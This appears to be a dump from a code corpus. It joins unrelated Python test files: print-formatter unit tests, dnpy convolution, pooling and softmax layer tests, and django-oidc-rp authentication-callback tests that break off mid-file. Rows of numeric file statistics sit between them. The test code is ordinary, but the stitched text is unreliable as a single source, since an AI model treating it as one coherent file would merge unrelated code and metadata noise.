return PrintFormatter._remove_line_breaks(str)
class PrintFormatterTestCase(unittest.TestCase):
# Test _remove_line_breaks
def test_remove_line_breaks_remove(self):
"""Test that the method actually removes line breaks"""
test_str = "\ntest\n\n bold\n str"
clean_str = PublicPrintFormatter.public_remove_line_breaks(test_str)
self.assertEqual(clean_str, "test bold str")
def test_remove_line_breaks_removes_leading_trailing_spaces(self):
"""Test that the method removes leading and trailing spaces"""
test_str = " test bold str "
clean_str = PublicPrintFormatter.public_remove_line_breaks(test_str)
self.assertEqual(clean_str, "test bold str")
def test_remove_line_breaks_preserves_string(self):
"""Test that the method preserves strings without line breaks, leading or trailing spaces"""
test_str = "test bold str"
clean_str = PublicPrintFormatter.public_remove_line_breaks(test_str)
self.assertEqual(clean_str, "test bold str")
# Test _remove_format_marks
def test_remove_format_mark_bold(self):
"""Test that the method to remove format marks works with bold"""
test_str = "test " + Color.BOLD + "bold" + Color.END + " str"
clean_str = PublicPrintFormatter.public_remove_format_marks(test_str)
self.assertEqual(clean_str, "test bold str")
def test_remove_format_mark_no_mark(self):
"""Test that the method to remove format marks leaves str untouched when nothing to do"""
test_str = "test clean str"
clean_str = PublicPrintFormatter.public_remove_format_marks(test_str)
self.assertEqual(clean_str, test_str)
test_str2 = ""
clean_str2 = PublicPrintFormatter.public_remove_format_marks(test_str2)
self.assertEqual(clean_str2, test_str2)
# Test title
def test_title_line_breaks(self):
"""Test that the result begins and ends with a line break"""
test_str = "test str"
formatted_str = PrintFormatter.title(test_str)
str_length = len(formatted_str)
self.assertTrue(str_length > 2)
self.assertEqual(formatted_str[0], '\n')
self.assertEqual(formatted_str[str_length - 1], '\n')
def test_title_is_bold(self):
"""Test that the result format is surrounded by bold commands"""
test_str = "test str"
formatted_str = PrintFormatter.title(test_str)
str_length = len(formatted_str)
self.assertTrue(str_length > 8)
self.assertEqual(formatted_str.find('\033[1m'), 1)
self.assertEqual(formatted_str.find('\033[0m'), str_length - 5)
def test_title_is_upper(self):
"""Test that the content to format is kept as upper case"""
test_str = "test str"
formatted_str = PrintFormatter.title(test_str)
self.assertEqual(formatted_str.count(test_str.upper()), 1)
def test_title_empty_string(self):
"""Test that the result is an empty string for an empty string"""
test_str = ""
formatted_str = PrintFormatter.title(test_str)
self.assertEqual(formatted_str, "")
def test_title_containing_formatting(self):
"""Test that title is correct when there was already formatting marks
(internal formatting shall be removed)
"""
test_str = "test " + Color.BOLD + "bold" + Color.END + " str"
formatted_str = PrintFormatter.title(test_str)
self.assertEqual(formatted_str, "\n\033[1mTEST BOLD STR\033[0m\n")
def test_title_removes_inner_line_breaks(self):
"""Test that inner line breaks are removed"""
test_str = "test\nbroken\nstr"
formatted_str = PrintFormatter.title(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, "\n\033[1mTEST BROKEN STR\033[0m\n")
# Test section
def test_section_line_breaks(self):
"""Test that the result begins and ends with a line break"""
test_str = "test str"
formatted_str = PrintFormatter.section(test_str)
str_length = len(formatted_str)
self.assertTrue(str_length > 2)
self.assertEqual(formatted_str[0], '\n')
self.assertEqual(formatted_str[str_length - 1], '\n')
def test_section_is_bold(self):
"""Test that the result format is surrounded by bold commands"""
test_str = "test str"
formatted_str = PrintFormatter.section(test_str)
str_length = len(formatted_str)
self.assertTrue(str_length > 8)
self.assertEqual(formatted_str.find('\033[1m'), 1)
self.assertEqual(formatted_str.find('\033[0m'), str_length - 5)
def test_section_is_upper(self):
"""Test that the content to format is kept as upper case"""
test_str = "test str"
formatted_str = PrintFormatter.section(test_str)
self.assertEqual(formatted_str.count(test_str.upper()), 1)
def test_section_empty_string(self):
"""Test that the result is an empty string for an empty string"""
test_str = ""
formatted_str = PrintFormatter.section(test_str)
self.assertEqual(formatted_str, "")
def test_section_containing_formatting(self):
"""Test that title is correct when there was already formatting marks
(internal formatting shall be removed)
"""
test_str = "test " + Color.BOLD + "bold" + Color.END + " str"
formatted_str = PrintFormatter.section(test_str)
self.assertEqual(formatted_str, "\n\033[1mTEST BOLD STR\033[0m\n")
def test_section_removed_inner_line_breaks(self):
"""Test that inner line breaks are removed"""
test_str = "test\nbroken\nstr"
formatted_str = PrintFormatter.section(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, "\n\033[1mTEST BROKEN STR\033[0m\n")
# Test paragraph
def test_paragraph_line_breaks(self):
"""Test that the result begins and ends with a line break"""
test_str = "test str"
formatted_str = PrintFormatter.paragraph(test_str)
str_length = len(formatted_str)
self.assertTrue(str_length > 2)
self.assertEqual(formatted_str[0], '\n')
self.assertEqual(formatted_str[str_length - 1], '\n')
def test_paragraph_is_indented(self):
"""Test that the result format is properly indented"""
test_str = "test str"
formatted_str = PrintFormatter.paragraph(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, "\n test str\n")
def test_paragraph_empty_string(self):
"""Test that the result is an empty string for an empty string"""
test_str = ""
formatted_str = PrintFormatter.paragraph(test_str)
self.assertEqual(formatted_str, "")
def test_paragraph_containing_formatting(self):
"""Test that internal formatting marks are preserved"""
test_str = "test " + Color.BOLD + "bold" + Color.END + " str"
formatted_str = PrintFormatter.paragraph(test_str)
self.assertEqual(formatted_str, "\n test \033[1mbold\033[0m str\n")
def test_paragraph_removes_internal_line_breaks(self):
"""Test that inner line breaks are replaced by spaces"""
test_str = "test\nbroken\nstr"
formatted_str = PrintFormatter.paragraph(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, "\n test broken str\n")
def test_paragraph_preserves_capitalization(self):
"""Test that capitalization is preserved"""
test_str = "tEst brOKen str"
formatted_str = PrintFormatter.paragraph(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, "\n tEst brOKen str\n")
# Test paragraphsub
def test_paragraphsub_ends_with_line_breaks(self):
"""Test that the result ends with a line break"""
test_str = "test str"
formatted_str = PrintFormatter.paragraphsub(test_str)
str_length = len(formatted_str)
self.assertTrue(str_length > 2)
self.assertEqual(formatted_str[str_length - 1], '\n')
def test_paragraphsub_is_indented(self):
"""Test that the result format is properly indented"""
test_str = "test str"
formatted_str = PrintFormatter.paragraphsub(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, " test str\n")
def test_paragraphsub_empty_string(self):
"""Test that the result is an empty string for an empty string"""
test_str = ""
formatted_str = PrintFormatter.paragraphsub(test_str)
self.assertEqual(formatted_str, "")
def test_paragraphsub_containing_formatting(self):
"""Test that internal formatting marks are preserved"""
test_str = "test " + Color.BOLD + "bold" + Color.END + " str"
formatted_str = PrintFormatter.paragraphsub(test_str)
self.assertEqual(formatted_str, " test \033[1mbold\033[0m str\n")
def test_paragraphsub_removes_internal_line_breaks(self):
"""Test that inner line breaks are replaced by spaces"""
test_str = "test\nbroken\nstr"
formatted_str = PrintFormatter.paragraphsub(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, " test broken str\n")
def test_paragraphsub_preserves_capitalization(self):
"""Test that capitalization is preserved"""
test_str = "tEst brOKen str"
formatted_str = PrintFormatter.paragraphsub(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, " tEst brOKen str\n")
| 42.7125
| 100
| 0.680226
| 1,295
| 10,251
| 5.135907
| 0.09112
| 0.076831
| 0.052323
| 0.117727
| 0.862577
| 0.830401
| 0.810404
| 0.805593
| 0.801383
| 0.775823
| 0
| 0.011094
| 0.226222
| 10,251
| 239
| 101
| 42.891213
| 0.827408
| 0.179592
| 0
| 0.651899
| 0
| 0
| 0.089968
| 0
| 0
| 0
| 0
| 0
| 0.259494
| 1
| 0.202532
| false
| 0
| 0.018987
| 0.012658
| 0.246835
| 0.012658
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
42ef12927a6df133428cabc17c2c88f2390fd1d7
| 15,026
|
py
|
Python
|
tests/coverage/test_layers.py
|
salvacarrion/dnpy
|
7685355076dbdbf76a4c06c0004aa65fe2e62603
|
[
"MIT"
] | null | null | null |
tests/coverage/test_layers.py
|
salvacarrion/dnpy
|
7685355076dbdbf76a4c06c0004aa65fe2e62603
|
[
"MIT"
] | null | null | null |
tests/coverage/test_layers.py
|
salvacarrion/dnpy
|
7685355076dbdbf76a4c06c0004aa65fe2e62603
|
[
"MIT"
] | null | null | null |
import unittest
from dnpy import utils
from dnpy.layers import *
from dnpy.net import Net
from dnpy.optimizers import *
import numpy as np
class TestLayersMethods(unittest.TestCase):
    """Numerical checks of dnpy layers against hand-computed references.

    The original repeated the same Input/forward/backward/assert boilerplate
    in every test; it is factored into ``_check_forward_backward``.
    """

    def _check_forward_backward(self, in_data, make_layer, ref_out, ref_back,
                                delta=None, initialize=False, atol=None):
        """Run one layer forward and backward and verify both directions.

        Parameters
        ----------
        in_data : np.ndarray
            Batched input tensor assigned to an ``Input`` layer.
        make_layer : callable
            Receives the ``Input`` layer, returns the layer under test.
        ref_out : np.ndarray
            Expected forward output.
        ref_back : np.ndarray
            Expected delta propagated back to the input layer.
        delta : np.ndarray, optional
            Upstream delta; defaults to ones shaped like ``ref_out``.
        initialize : bool
            Call ``initialize()`` on the layer (needed by conv kernels).
        atol : float, optional
            When given, compare with ``np.allclose`` instead of exact equality.
        """
        l0 = Input(shape=in_data[0].shape)
        l0.output = in_data
        l1 = make_layer(l0)
        if initialize:
            l1.initialize()
        l1.forward()
        if atol is None:
            self.assertTrue(np.all(ref_out == l1.output))
        else:
            self.assertTrue(np.allclose(ref_out, l1.output, atol=atol))
        l1.delta = np.ones_like(ref_out) if delta is None else delta
        l1.backward()
        if atol is None:
            self.assertTrue(np.all(ref_back == l0.delta))
        else:
            self.assertTrue(np.allclose(ref_back, l0.delta, atol=atol))

    def test_outputs(self):
        """utils.get_output must reproduce known convolution output sizes."""
        cases = [
            ((4, 4), (3, 3), (1, 1), (0, 0), (2, 2)),
            ((5, 5), (4, 4), (1, 1), (2, 2), (6, 6)),
            ((5, 5), (3, 3), (1, 1), (1, 1), (5, 5)),
            ((5, 5), (3, 3), (1, 1), (2, 2), (7, 7)),
            ((5, 5), (3, 3), (2, 2), (0, 0), (2, 2)),
            ((5, 5), (3, 3), (2, 2), (1, 1), (3, 3)),
        ]
        for input_size, kernel_size, strides, padding, expected in cases:
            r = utils.get_output(input_size=input_size, kernel_size=kernel_size,
                                 strides=strides, padding=padding)
            self.assertTrue(np.all(r == np.array(expected)))

    def test_conv2d_2x2_none_temp1(self):
        """2x2 all-ones kernel, no padding, on an already zero-padded 7x7 map."""
        t1_in_img = np.array([[
            [
                [0, 0, 0, 0, 0, 0, 0],
                [0, 0, 1, 0, 4, 5, 0],
                [0, 2, 3, 2, 1, 3, 0],
                [0, 4, 4, 0, 4, 3, 0],
                [0, 2, 5, 2, 6, 4, 0],
                [0, 1, 0, 0, 5, 7, 0],
                [0, 0, 0, 0, 0, 0, 0],
            ]
        ]])
        t1_ref_img = np.array([[
            [
                [0, 1, 1, 4, 9, 5],
                [2, 6, 6, 7, 13, 8],
                [6, 13, 9, 7, 11, 6],
                [6, 15, 11, 12, 17, 7],
                [3, 8, 7, 13, 22, 11],
                [1, 1, 0, 5, 12, 7]
            ]
        ]])
        t1_ref_back = np.array([[
            [
                [1, 2, 2, 2, 2, 2, 1],
                [2, 4, 4, 4, 4, 4, 2],
                [2, 4, 4, 4, 4, 4, 2],
                [2, 4, 4, 4, 4, 4, 2],
                [2, 4, 4, 4, 4, 4, 2],
                [2, 4, 4, 4, 4, 4, 2],
                [1, 2, 2, 2, 2, 2, 1]
            ]
        ]])
        self._check_forward_backward(
            t1_in_img,
            lambda l0: Conv2D(l0, 1, kernel_size=(2, 2), strides=(1, 1),
                              padding="none",
                              kernel_initializer=initializers.Constant(fill_value=1)),
            t1_ref_img, t1_ref_back, initialize=True)

    def test_conv2d_2x2_none_temp2(self):
        """2x2 all-ones kernel, no padding, 6x6 input."""
        t1_in_img = np.array([[
            [
                [0, 1, 0, 4, 5, 0],
                [2, 3, 2, 1, 3, 0],
                [4, 4, 0, 4, 3, 0],
                [2, 5, 2, 6, 4, 0],
                [1, 0, 0, 5, 7, 0],
                [0, 0, 0, 0, 0, 0],
            ]
        ]])
        t1_ref_img = np.array([[
            [
                [6, 6, 7, 13, 8],
                [13, 9, 7, 11, 6],
                [15, 11, 12, 17, 7],
                [8, 7, 13, 22, 11],
                [1, 0, 5, 12, 7]
            ]
        ]])
        t1_ref_back = np.array([[
            [
                [1, 2, 2, 2, 2, 1],
                [2, 4, 4, 4, 4, 2],
                [2, 4, 4, 4, 4, 2],
                [2, 4, 4, 4, 4, 2],
                [2, 4, 4, 4, 4, 2],
                [1, 2, 2, 2, 2, 1]
            ]
        ]])
        self._check_forward_backward(
            t1_in_img,
            lambda l0: Conv2D(l0, 1, kernel_size=(2, 2), strides=(1, 1),
                              padding="none",
                              kernel_initializer=initializers.Constant(fill_value=1)),
            t1_ref_img, t1_ref_back, initialize=True)

    def test_conv2d_2x2_none(self):
        """2x2 all-ones kernel, no padding, 5x5 input."""
        t1_in_img = np.array([[
            [
                [0, 1, 0, 4, 5],
                [2, 3, 2, 1, 3],
                [4, 4, 0, 4, 3],
                [2, 5, 2, 6, 4],
                [1, 0, 0, 5, 7],
            ]
        ]])
        t1_ref_img = np.array([[
            [
                [6, 6, 7, 13],
                [13, 9, 7, 11],
                [15, 11, 12, 17],
                [8, 7, 13, 22]
            ]
        ]])
        t1_ref_back = np.array([[
            [
                [1, 2, 2, 2, 1],
                [2, 4, 4, 4, 2],
                [2, 4, 4, 4, 2],
                [2, 4, 4, 4, 2],
                [1, 2, 2, 2, 1],
            ]
        ]])
        self._check_forward_backward(
            t1_in_img,
            lambda l0: Conv2D(l0, 1, kernel_size=(2, 2), strides=(1, 1),
                              padding="none",
                              kernel_initializer=initializers.Constant(fill_value=1)),
            t1_ref_img, t1_ref_back, initialize=True)

    def test_conv2d_2x2_same(self):
        """2x2 all-ones kernel with "same" padding preserves spatial size."""
        t1_in_img = np.array([[
            [
                [0, 1, 0, 4, 5],
                [2, 3, 2, 1, 3],
                [4, 4, 0, 4, 3],
                [2, 5, 2, 6, 4],
                [1, 0, 0, 5, 7],
            ]
        ]])
        t1_ref_img = np.array([[
            [
                [6, 6, 7, 13, 8],
                [13, 9, 7, 11, 6],
                [15, 11, 12, 17, 7],
                [8, 7, 13, 22, 11],
                [1, 0, 5, 12, 7]
            ]
        ]])
        t1_ref_back = np.array([[
            [
                [1, 2, 2, 2, 2],
                [2, 4, 4, 4, 4],
                [2, 4, 4, 4, 4],
                [2, 4, 4, 4, 4],
                [2, 4, 4, 4, 4]
            ]
        ]])
        self._check_forward_backward(
            t1_in_img,
            lambda l0: Conv2D(l0, 1, kernel_size=(2, 2), strides=(1, 1),
                              padding="same",
                              kernel_initializer=initializers.Constant(fill_value=1)),
            t1_ref_img, t1_ref_back, initialize=True)

    def test_conv2d_3x3_same(self):
        """3x3 kernel, "same" padding, 3-channel input summed into 1 filter."""
        t1_in_img = np.array([[
            [
                [0, 1, 0, 4, 5],
                [2, 3, 2, 1, 3],
                [4, 4, 0, 4, 3],
                [2, 5, 2, 6, 4],
                [1, 0, 0, 5, 7],
            ]
        ]])
        t1_in_img = np.concatenate([t1_in_img, t1_in_img*10, t1_in_img*100], axis=1)
        t1_ref_img = np.array([[
            [
                [6, 8, 11, 15, 13],
                [14, 16, 19, 22, 20],
                [20, 24, 27, 25, 21],
                [16, 18, 26, 31, 29],
                [8, 10, 18, 24, 22],
            ]
        ]])
        # one output channel: contributions of all three input channels add up
        t1_ref_img = t1_ref_img + t1_ref_img*10 + t1_ref_img*100
        t1_ref_back = np.array([[
            [
                [4, 6, 6, 6, 4],
                [6, 9, 9, 9, 6],
                [6, 9, 9, 9, 6],
                [6, 9, 9, 9, 6],
                [4, 6, 6, 6, 4],
            ]
        ]])
        t1_ref_back = np.concatenate([t1_ref_back, t1_ref_back, t1_ref_back], axis=1)
        self._check_forward_backward(
            t1_in_img,
            lambda l0: Conv2D(l0, 1, kernel_size=(3, 3), strides=(1, 1),
                              padding="same",
                              kernel_initializer=initializers.Constant(fill_value=1)),
            t1_ref_img, t1_ref_back, initialize=True)

    def test_depthwiseconv2d_3x3_same(self):
        """Depthwise 3x3 conv keeps channels separate (per-channel outputs)."""
        t1_in_img = np.array([[
            [
                [0, 1, 0, 4, 5],
                [2, 3, 2, 1, 3],
                [4, 4, 0, 4, 3],
                [2, 5, 2, 6, 4],
                [1, 0, 0, 5, 7],
            ]
        ]])
        t1_in_img = np.concatenate([t1_in_img, t1_in_img*10, t1_in_img*100], axis=1)
        t1_ref_img = np.array([[
            [
                [6, 8, 11, 15, 13],
                [14, 16, 19, 22, 20],
                [20, 24, 27, 25, 21],
                [16, 18, 26, 31, 29],
                [8, 10, 18, 24, 22],
            ]
        ]])
        t1_ref_img = np.concatenate([t1_ref_img, t1_ref_img*10, t1_ref_img*100], axis=1)
        t1_ref_back = np.array([[
            [
                [4, 6, 6, 6, 4],
                [6, 9, 9, 9, 6],
                [6, 9, 9, 9, 6],
                [6, 9, 9, 9, 6],
                [4, 6, 6, 6, 4],
            ]
        ]])
        t1_ref_back = np.concatenate([t1_ref_back, t1_ref_back, t1_ref_back], axis=1)
        self._check_forward_backward(
            t1_in_img,
            lambda l0: DepthwiseConv2D(l0, kernel_size=(3, 3), strides=(1, 1),
                                       padding="same",
                                       kernel_initializer=initializers.Constant(fill_value=1)),
            t1_ref_img, t1_ref_back, initialize=True)

    def test_maxpool_2x2_none(self):
        """2x2/stride-2 max pooling without padding; delta routed to maxima."""
        t1_in_img = np.array([[
            [
                [0, 1, 0, 4, 5],
                [2, 3, 2, 1, 3],
                [4, 4, 0, 4, 3],
                [2, 5, 2, 6, 4],
                [1, 0, 0, 5, 7],
            ]
        ]])
        t1_ref_img = np.array([[
            [
                [3, 4],
                [5, 6],
            ]
        ]])
        t1_ref_back = np.array([[
            [
                [0, 0, 0, 1, 0],
                [0, 1, 0, 0, 0],
                [0, 0, 0, 0, 0],
                [0, 1, 0, 1, 0],
                [0, 0, 0, 0, 0],
            ]
        ]])
        self._check_forward_backward(
            t1_in_img,
            lambda l0: MaxPool2D(l0, pool_size=(2, 2), strides=(2, 2), padding="none"),
            t1_ref_img, t1_ref_back)

    def test_maxpool_2x2_same(self):
        """2x2/stride-2 max pooling with "same" padding."""
        t1_in_img = np.array([[
            [
                [0, 1, 0, 4, 5],
                [2, 3, 2, 1, 3],
                [4, 4, 0, 4, 3],
                [2, 5, 2, 6, 4],
                [1, 0, 0, 5, 7],
            ]
        ]])
        t1_ref_img = np.array([[
            [
                [3, 4, 5],
                [5, 6, 4],
                [1, 5, 7],
            ]
        ]])
        t1_ref_back = np.array([[
            [
                [0, 0, 0, 1, 1],
                [0, 1, 0, 0, 0],
                [0, 0, 0, 0, 0],
                [0, 1, 0, 1, 1],
                [1, 0, 0, 1, 1],
            ]
        ]])
        self._check_forward_backward(
            t1_in_img,
            lambda l0: MaxPool2D(l0, pool_size=(2, 2), strides=(2, 2), padding="same"),
            t1_ref_img, t1_ref_back)

    def test_avgpool_2x2_none(self):
        """2x2/stride-2 average pooling without padding; delta spread evenly."""
        t1_in_img = np.array([[
            [
                [0, 1, 0, 4, 5],
                [2, 3, 2, 1, 3],
                [4, 4, 0, 4, 3],
                [2, 5, 2, 6, 4],
                [1, 0, 0, 5, 7],
            ]
        ]])
        t1_ref_img = np.array([[
            [
                [1.5, 1.75],
                [3.75, 3.0],
            ]
        ]])
        t1_ref_back = np.array([[
            [
                [0.25000, 0.25000, 0.25000, 0.25000, 0.00000],
                [0.25000, 0.25000, 0.25000, 0.25000, 0.00000],
                [0.25000, 0.25000, 0.25000, 0.25000, 0.00000],
                [0.25000, 0.25000, 0.25000, 0.25000, 0.00000],
                [0.00000, 0.00000, 0.00000, 0.00000, 0.00000],
            ]
        ]])
        self._check_forward_backward(
            t1_in_img,
            lambda l0: AvgPool2D(l0, pool_size=(2, 2), strides=(2, 2), padding="none"),
            t1_ref_img, t1_ref_back)

    def test_avgpool_2x2_same(self):
        """2x2/stride-2 average pooling with "same" padding."""
        t1_in_img = np.array([[
            [
                [0, 1, 0, 4, 5],
                [2, 3, 2, 1, 3],
                [4, 4, 0, 4, 3],
                [2, 5, 2, 6, 4],
                [1, 0, 0, 5, 7],
            ]
        ]])
        t1_ref_img = np.array([[
            [
                [1.5, 1.75, 2.0],
                [3.75, 3.0, 1.75],
                [0.25, 1.25, 1.75],
            ]
        ]])
        t1_ref_back = np.array([[
            [
                [0.25, 0.25, 0.25, 0.25, 0.25],
                [0.25, 0.25, 0.25, 0.25, 0.25],
                [0.25, 0.25, 0.25, 0.25, 0.25],
                [0.25, 0.25, 0.25, 0.25, 0.25],
                [0.25, 0.25, 0.25, 0.25, 0.25],
            ]
        ]])
        self._check_forward_backward(
            t1_in_img,
            lambda l0: AvgPool2D(l0, pool_size=(2, 2), strides=(2, 2), padding="same"),
            t1_ref_img, t1_ref_back)

    def test_softmax(self):
        """Stable softmax forward plus its Jacobian-vector backward pass."""
        t1_in = np.array([
            [0.0303, 0.2418, -1.9007],
            [-4.7348, -0.7624, -0.5518],
        ])
        t1_ref = np.array([
            [0.42007398, 0.51901399, 0.06091204],
            [0.00835603, 0.44380405, 0.54783992],
        ])
        t1_delta = np.array([
            [1, 2, 3],
            [3, 2, 1],
        ])
        t1_ref_back = np.array([
            [-0.26919939, 0.18641007, 0.08278932],
            [0.01286397, 0.23942514, -0.25228911],
        ])
        self._check_forward_backward(
            t1_in,
            lambda l0: Softmax(l0, stable=True),
            t1_ref, t1_ref_back, delta=t1_delta, atol=1e-4)
if __name__ == "__main__":
    # Allow running this test module directly: python test_layers.py
    unittest.main()
| 28.458333
| 100
| 0.4039
| 2,106
| 15,026
| 2.734093
| 0.060779
| 0.060785
| 0.046197
| 0.020841
| 0.889545
| 0.871831
| 0.845085
| 0.823724
| 0.813651
| 0.791942
| 0
| 0.188097
| 0.42859
| 15,026
| 527
| 101
| 28.512334
| 0.48253
| 0.022627
| 0
| 0.612827
| 0
| 0
| 0.003278
| 0
| 0
| 0
| 0
| 0
| 0.066508
| 1
| 0.028504
| false
| 0
| 0.014252
| 0
| 0.045131
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
28150b7ca7848435a3cc7bdf630775ab7064c616
| 14,437
|
py
|
Python
|
tests/integration/test_views.py
|
urosn74/django-oidc-rp
|
a5028e76fadaecc0aeac96b1d0bc81db8366d221
|
[
"MIT"
] | null | null | null |
tests/integration/test_views.py
|
urosn74/django-oidc-rp
|
a5028e76fadaecc0aeac96b1d0bc81db8366d221
|
[
"MIT"
] | null | null | null |
tests/integration/test_views.py
|
urosn74/django-oidc-rp
|
a5028e76fadaecc0aeac96b1d0bc81db8366d221
|
[
"MIT"
] | null | null | null |
import unittest.mock
from urllib.parse import parse_qs, urlparse
import pytest
from django.contrib.auth.models import User
from django.test import override_settings
from django.urls import reverse
@pytest.mark.django_db
class TestOIDCAuthRequestView:
    """Tests for the view redirecting users to the OIDC authorization server.

    The original duplicated the request/parse boilerplate in every test; it
    is factored into ``_request_authentication``.
    """

    def _request_authentication(self, client):
        """GET the auth-request view; return (response, parsed redirect query)."""
        url = reverse('oidc_auth_request')
        response = client.get(url, follow=False)
        assert response.status_code == 302
        return response, parse_qs(urlparse(response.url).query)

    def test_can_redirect_the_user_to_the_authorization_server_to_be_authenticated(self, client):
        response, parsed_parameters = self._request_authentication(client)
        assert response.url.startswith('http://example.com/a/authorize')
        assert parsed_parameters['response_type'] == ['code', ]
        assert parsed_parameters['scope'] == ['openid email', ]
        assert parsed_parameters['client_id'] == ['DUMMY_CLIENT_ID', ]
        assert parsed_parameters['redirect_uri'] == ['http://testserver/oidc/auth/cb/', ]
        assert parsed_parameters['state']
        assert parsed_parameters['nonce']

    @unittest.mock.patch('oidc_rp.conf.settings.USE_NONCE', False)
    def test_do_not_embed_a_nonce_in_the_request_parameters_if_the_related_setting_is_disabled(
            self, client):
        _, parsed_parameters = self._request_authentication(client)
        assert parsed_parameters['response_type'] == ['code', ]
        assert parsed_parameters['scope'] == ['openid email', ]
        assert parsed_parameters['client_id'] == ['DUMMY_CLIENT_ID', ]
        assert parsed_parameters['redirect_uri'] == ['http://testserver/oidc/auth/cb/', ]
        assert parsed_parameters['state']
        assert 'nonce' not in parsed_parameters

    def test_saves_the_authorization_state_value_in_the_user_session(self, client):
        _, parsed_parameters = self._request_authentication(client)
        assert client.session['oidc_auth_state'] == parsed_parameters['state'][0]

    def test_saves_the_nonce_value_in_the_user_session_if_applicable(self, client):
        _, parsed_parameters = self._request_authentication(client)
        assert client.session['oidc_auth_nonce'] == parsed_parameters['nonce'][0]
@pytest.mark.django_db
class TestOIDCAuthCallbackView:
    """Tests for the view handling the OIDC provider's authorization callback.

    The original repeated the session-priming boilerplate in every test; it
    is factored into ``_prepare_session``.
    """

    def _prepare_session(self, client, **values):
        """Persist the given key/value pairs in the test client's session."""
        session = client.session
        for key, value in values.items():
            session[key] = value
        session.save()

    @unittest.mock.patch('django.contrib.auth.authenticate')
    @unittest.mock.patch('django.contrib.auth.login')
    @unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_REDIRECT_URI', '/success')
    def test_can_properly_authenticate_users_and_redirect_them_to_a_success_url(
            self, mocked_login, mocked_authenticate, client):
        user = User.objects.create_user('foo')
        mocked_authenticate.return_value = user
        self._prepare_session(client, oidc_auth_state='dummystate',
                              oidc_auth_nonce='dummynonce')
        url = reverse('oidc_auth_callback')
        response = client.get(url, {'code': 'dummycode', 'state': 'dummystate'})
        assert response.status_code == 302
        assert response.url == '/success'
        assert mocked_authenticate.call_count == 1
        assert mocked_login.call_count == 1

    @unittest.mock.patch('django.contrib.auth.authenticate')
    @unittest.mock.patch('django.contrib.auth.login')
    @unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_REDIRECT_URI', '/success')
    @unittest.mock.patch('oidc_rp.conf.settings.USE_NONCE', False)
    def test_can_properly_authenticate_users_and_redirect_them_to_a_success_url_without_nonce(
            self, mocked_login, mocked_authenticate, client):
        user = User.objects.create_user('foo')
        mocked_authenticate.return_value = user
        self._prepare_session(client, oidc_auth_state='dummystate')
        url = reverse('oidc_auth_callback')
        response = client.get(url, {'code': 'dummycode', 'state': 'dummystate'})
        assert response.status_code == 302
        assert response.url == '/success'
        assert mocked_authenticate.call_count == 1
        assert mocked_login.call_count == 1

    @unittest.mock.patch('django.contrib.auth.authenticate')
    @unittest.mock.patch('django.contrib.auth.login')
    def test_can_properly_authenticate_users_and_redirect_them_to_a_custom_success_url(
            self, mocked_login, mocked_authenticate, client):
        user = User.objects.create_user('foo')
        mocked_authenticate.return_value = user
        # 'oidc_auth_next_url' overrides the configured success redirect.
        self._prepare_session(client, oidc_auth_state='dummystate',
                              oidc_auth_nonce='dummynonce',
                              oidc_auth_next_url='/profile')
        url = reverse('oidc_auth_callback')
        response = client.get(url, {'code': 'dummycode', 'state': 'dummystate'})
        assert response.status_code == 302
        assert response.url == '/profile'
        assert mocked_authenticate.call_count == 1
        assert mocked_login.call_count == 1

    @unittest.mock.patch('django.contrib.auth.authenticate')
    @unittest.mock.patch('django.contrib.auth.login')
    @unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_FAILURE_REDIRECT_URI', '/fail')
    def test_can_redirect_users_to_a_failure_page_in_case_of_missing_nonce(
            self, mocked_login, mocked_authenticate, client):
        user = User.objects.create_user('foo')
        mocked_authenticate.return_value = user
        # No nonce stored in the session: authentication must not be attempted.
        self._prepare_session(client, oidc_auth_state='dummystate')
        url = reverse('oidc_auth_callback')
        response = client.get(url, {'code': 'dummycode', 'state': 'dummystate'})
        assert response.status_code == 302
        assert response.url == '/fail'
        assert not mocked_authenticate.call_count
        assert not mocked_login.call_count

    @unittest.mock.patch('django.contrib.auth.authenticate')
    @unittest.mock.patch('django.contrib.auth.login')
    @unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_FAILURE_REDIRECT_URI', '/fail')
    def test_can_redirect_users_to_a_failure_page_in_case_of_missing_code_parameter(
            self, mocked_login, mocked_authenticate, client):
        user = User.objects.create_user('foo')
        mocked_authenticate.return_value = user
        self._prepare_session(client, oidc_auth_state='dummystate',
                              oidc_auth_nonce='dummynonce')
        url = reverse('oidc_auth_callback')
        response = client.get(url, {'state': 'dummystate'})
        assert response.status_code == 302
        assert response.url == '/fail'
        assert not mocked_authenticate.call_count
        assert not mocked_login.call_count

    @unittest.mock.patch('django.contrib.auth.authenticate')
    @unittest.mock.patch('django.contrib.auth.login')
    @unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_FAILURE_REDIRECT_URI', '/fail')
    def test_can_redirect_users_to_a_failure_page_in_case_of_missing_state_parameter(
            self, mocked_login, mocked_authenticate, client):
        user = User.objects.create_user('foo')
        mocked_authenticate.return_value = user
        self._prepare_session(client, oidc_auth_state='dummystate',
                              oidc_auth_nonce='dummynonce')
        url = reverse('oidc_auth_callback')
        response = client.get(url, {'code': 'dummycode'})
        assert response.status_code == 302
        assert response.url == '/fail'
        assert not mocked_authenticate.call_count
        assert not mocked_login.call_count

    @unittest.mock.patch('django.contrib.auth.authenticate')
    @unittest.mock.patch('django.contrib.auth.login')
